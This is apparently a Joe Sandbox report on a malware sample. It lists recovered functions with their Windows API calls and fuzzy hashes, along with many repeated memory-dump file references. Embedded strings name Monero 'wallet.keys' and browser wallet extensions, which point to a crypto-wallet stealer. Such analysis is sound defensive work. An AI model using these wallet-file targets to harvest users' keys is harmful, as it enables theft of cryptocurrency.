Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
Instruction ID: f75927dd7689228d5e24d63e667902449e0cae48c116a4f9b3256e3c556283a0
Opcode Fuzzy Hash: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
Instruction Fuzzy Hash: AC3106B4A00309EFDF14CFA4D995BAE77B9FF48340F108158E911A7294DB78AA41CFA1

Function 00934780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,006FE190), ref: 009347DB

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

lstrcat.KERNEL32(?,00000000), ref: 00934801
lstrcat.KERNEL32(?,?), ref: 00934820
lstrcat.KERNEL32(?,?), ref: 00934834
lstrcat.KERNEL32(?,006EB700), ref: 00934847
lstrcat.KERNEL32(?,?), ref: 0093485B
lstrcat.KERNEL32(?,006FDAF0), ref: 0093486F

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F

Part of subcall function 00934570: GetProcessHeap.KERNEL32(00000000,wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB), ref: 00934580
Part of subcall function 00934570: RtlAllocateHeap.NTDLL(00000000), ref: 00934587
Part of subcall function 00934570: wsprintfA.USER32 ref: 009345A6
Part of subcall function 00934570: FindFirstFileA.KERNEL32(?,?), ref: 009345BD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 165cd0a084985acef09d49143fe3cb01c360c46e51ff1f2796e3d87aba825048
Instruction ID: 7a2c378e54c70493f71b58f6a6fbd6e30555a5ac48381ed7b1f0aaadfaa9aa85
Opcode Fuzzy Hash: 165cd0a084985acef09d49143fe3cb01c360c46e51ff1f2796e3d87aba825048
Instruction Fuzzy Hash: 663132B290031867CB14F7A0DC85FEE737DAB98700F404989B355A7191EEB4E6898F95

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 00937E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937E37
RtlAllocateHeap.NTDLL(00000000), ref: 00937E3E
RegOpenKeyExA.KERNEL32(80000002,006EBF08,00000000,00020119,?), ref: 00937E5E
RegQueryValueExA.KERNEL32(?,006FDC70,00000000,00000000,000000FF,000000FF), ref: 00937E7F
RegCloseKey.ADVAPI32(?), ref: 00937E92

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
Instruction ID: f38bf3adaf3e63a7fb529d791b351650bd0a8752852454138187ae5a37f4049a
Opcode Fuzzy Hash: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
Instruction Fuzzy Hash: 50113AB1A44205ABDB20CBD4DD49FBBBBB8EB44B10F104159F605A72D0DBB869008FA2

Function 009212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009212D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
RegCloseKey.ADVAPI32(?), ref: 009212FF

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
Instruction ID: 02a36a9a8980f23137638453859db967fe6e5bda61b2bdcf3cc415377f3af5fe
Opcode Fuzzy Hash: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
Instruction Fuzzy Hash: 9E01E6B5A40208BBDB14DFD4DC59FAEB7BCEB48701F108155FA15A72C0DAB5AA018F51

Function 0092A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006F8F08,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0092A0BD
LoadLibraryA.KERNEL32(006FDDD0), ref: 0092A146

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

SetEnvironmentVariableA.KERNEL32(006F8F08,00000000,00000000,?,009412D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00940AFE), ref: 0092A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0092A0B2, 0092A0C6, 0092A0DC

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 184e1a4cfc73dc2b837097d02573a8b64056419595104f97e399f3e29993c18d
Instruction ID: e78f1eb59a7b8b73269df212f2f1c755e2be1916a959fa4ac4d5db6dad0b6ebc
Opcode Fuzzy Hash: 184e1a4cfc73dc2b837097d02573a8b64056419595104f97e399f3e29993c18d
Instruction Fuzzy Hash: 4A410CB1901204AFCF05EFA4EC95BAA77B8BB49301F140129E605B32E5DFB95945CF63

Function 0092A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,006FA970,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 00938B86

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0092A3FF
lstrlen.KERNEL32(00000000), ref: 0092A6BC

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

DeleteFileA.KERNEL32(00000000), ref: 0092A743

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d3cd9beaa7dbdebb7f97cfc0747b3bd477c86147aaf7aaa7b9ae9167fcf411f3
Instruction ID: ec78896cd738047381d24339b067ac5de29d41ad9d76eafc27c60ede0dcef8bb
Opcode Fuzzy Hash: d3cd9beaa7dbdebb7f97cfc0747b3bd477c86147aaf7aaa7b9ae9167fcf411f3
Instruction Fuzzy Hash: D0E1BC72810118ABDB05FBA4DC92FEE7338AF94300F508169F557B60A1EF746A49CF66

Function 0092D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,006FA970,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 00938B86

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D801
lstrlen.KERNEL32(00000000), ref: 0092D99F
lstrlen.KERNEL32(00000000), ref: 0092D9B3
DeleteFileA.KERNEL32(00000000), ref: 0092DA32

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
